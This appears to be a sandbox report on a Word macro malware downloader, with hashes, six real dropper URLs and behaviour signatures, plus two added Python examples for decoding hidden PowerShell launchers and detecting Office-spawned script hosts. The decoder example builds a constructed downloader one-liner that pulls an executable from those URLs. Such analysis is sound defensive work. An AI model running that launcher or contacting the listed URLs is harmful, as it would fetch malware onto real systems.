General

  • Target: SecuriteInfo.com.W97M.DownLoader.5053.17523.965
  • Size: 83KB
  • Sample: 210120-b9pqmrwaxe
  • MD5: 8d56d1367c961e45f047bd453f1d083e
  • SHA1: d1fd9363ab7e13dc58adddc49237da769360e801
  • SHA256: a0ddd4c77bf541f12349e90e60de498bde50a2fa4d4234b7831f439d935753eb
  • SHA512: 3c9c8fbfcc2b9cd1a46d769dc43c6802920e30893dc72deffea168327be1e09e007e3b40617ebaeb0257f6436342c638835f51571c0723bd4741f3eb24b0379c

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated: URLs
  • URLs (type exe.dropper, the locations the PowerShell stage tries in order to fetch the next-stage executable):
      http://www.ausutra.com/wp-admin/Logs/
      http://artas.biz/c/System/
      http://www.spmkomputer.com/kasir/diagnostics/
      https://sislog.es/wp-admin/MSInfo/
      http://institutmestres.com/wp-includes/n7Fl9WDm/
      http://noithatcongnghieptantien.com/wp-content/Fonts/
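How a list like the one above is recovered from a macro-launched PowerShell stage, as an added example that is not part of the sandbox report and is not the sample's own code: the launcher is a Base64 `-EncodedCommand` over UTF-16LE text, so the analyst decodes that argument and pulls the URLs out of the result. The downloader script body used here (an `@`-joined URL list that is split and tried until one download works) is a constructed assumption built around the six reported URLs; only the URLs themselves come from the report.

```python
"""Added example (not from the sandbox report or the sample): decode a Base64
-EncodedCommand PowerShell launcher and extract the dropper URL list from it.
The launcher body is constructed to resemble an Office-macro downloader; it is
an assumption, not the sample's recovered script."""
import base64
import re

# The six exe.dropper URLs reported for this sample.
REPORT_URLS = [
    "http://www.ausutra.com/wp-admin/Logs/",
    "http://artas.biz/c/System/",
    "http://www.spmkomputer.com/kasir/diagnostics/",
    "https://sislog.es/wp-admin/MSInfo/",
    "http://institutmestres.com/wp-includes/n7Fl9WDm/",
    "http://noithatcongnghieptantien.com/wp-content/Fonts/",
]

# Constructed downloader body (assumption): an '@'-joined URL list that is
# split and tried in order until a download succeeds.
SAMPLE_SCRIPT = (
    "$u='" + "@".join(REPORT_URLS) + "'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,"
    "$env:TEMP+'\\s.exe');break}catch{}}"
)

URL_RE = re.compile(r"https?://[^\s'\"@)<>]+")
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENC_ARG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script):
    """PowerShell expects -EncodedCommand as Base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_command(b64):
    """Inverse of encode_command; raises ValueError/UnicodeDecodeError on junk."""
    return base64.b64decode(b64, validate=True).decode("utf-16le")


def build_launcher():
    """A command line of the shape a macro would hand to WScript.Shell (constructed)."""
    return "powershell.exe -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)


def extract_urls(cmdline):
    """Decode every encoded-command argument on the line and return the URLs
    found in the decoded script(s), deduplicated, in first-seen order."""
    found = []
    for m in ENC_ARG_RE.finditer(cmdline):
        try:
            script = decode_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue  # not a decodable payload; keep scanning the line
        for url in URL_RE.findall(script):
            if url not in found:
                found.append(url)
    return found


def defang(url):
    """Make a URL safe to paste into a report: hxxp://host[.]tld/path"""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return "hxxp" + scheme[4:] + "://" + host.replace(".", "[.]") + slash + path


if __name__ == "__main__":
    for u in extract_urls(build_launcher()):
        print(defang(u))
```

Run against a real process-creation log line the same function applies unchanged; a launcher that uses a different obfuscation layer (string concatenation, `-f` format operators, compression) needs an extra decoding pass before the URL regex sees plain text.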

Targets

    • Target: SecuriteInfo.com.W97M.DownLoader.5053.17523.965
    • Size: 83KB
    • MD5: 8d56d1367c961e45f047bd453f1d083e
    • SHA1: d1fd9363ab7e13dc58adddc49237da769360e801
    • SHA256: a0ddd4c77bf541f12349e90e60de498bde50a2fa4d4234b7831f439d935753eb
    • SHA512: 3c9c8fbfcc2b9cd1a46d769dc43c6802920e30893dc72deffea168327be1e09e007e3b40617ebaeb0257f6436342c638835f51571c0723bd4741f3eb24b0379c

    Score: 10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro. For a W97M document sample with a PowerShell (ps1) config, the expected shape is the Office application launching a script host.

    • Blocklisted process makes network request

    • Drops file in System32 directory

    • Enumerates physical storage devices

      Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the signature's generic description; nothing else in this report points to ransomware, so for a downloader treat the attribution as a heuristic rather than a finding.)
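Detection logic for the first two signatures above (an Office parent spawning a script host, and that child then making a network request), as an added example that is not part of the sandbox report: it correlates process-creation and network-connection events by ProcessGuid the way Sysmon exposes them. The events are constructed to match the shape of this report (WINWORD.EXE launching PowerShell, which then contacts one of the exe.dropper hosts); the exact process tree is an assumption, not something the report shows.

```python
"""Added example (not from the sandbox report): flag an Office application
spawning a script host/LOLBin and any network connection that child makes,
over constructed Sysmon-style events. The process tree is an assumption."""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# Constructed events. EventID 1 = process creation, EventID 3 = network
# connection (Sysmon numbering); ProcessGuid ties the two together.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\invoice.doc"'},
    {"EventID": 1, "ProcessGuid": "{B}",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc <base64 launcher>"},
    {"EventID": 3, "ProcessGuid": "{B}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "www.ausutra.com", "DestinationPort": 80},
    # Benign control: an admin shell launched from Explorer that also goes online.
    {"EventID": 1, "ProcessGuid": "{C}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
    {"EventID": 3, "ProcessGuid": "{C}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "www.powershellgallery.com", "DestinationPort": 443},
]


def basename(path):
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return alerts for (1) an Office app spawning a script host and (2) any
    network connection made by such a child. Events must be in time order."""
    alerts = []
    flagged = {}  # ProcessGuid -> creation event that raised the first alert
    for ev in events:
        if ev["EventID"] == 1:
            parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
            if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
                flagged[ev["ProcessGuid"]] = ev
                alerts.append({
                    "rule": "office_spawns_script_host",
                    "parent": parent, "child": child,
                    "detail": ev["CommandLine"],
                })
        elif ev["EventID"] == 3 and ev["ProcessGuid"] in flagged:
            origin = flagged[ev["ProcessGuid"]]
            alerts.append({
                "rule": "office_child_network_request",
                "parent": basename(origin["ParentImage"]),
                "child": basename(ev["Image"]),
                "detail": "%s:%s" % (ev["DestinationHostname"], ev["DestinationPort"]),
            })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["rule"], a["parent"], "->", a["child"], a["detail"])
```

The benign control process {C} is deliberately left unflagged: PowerShell making a network request is not suspicious on its own, it is the Office parent that gives the second rule its precision.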

MITRE ATT&CK Enterprise v6

Tasks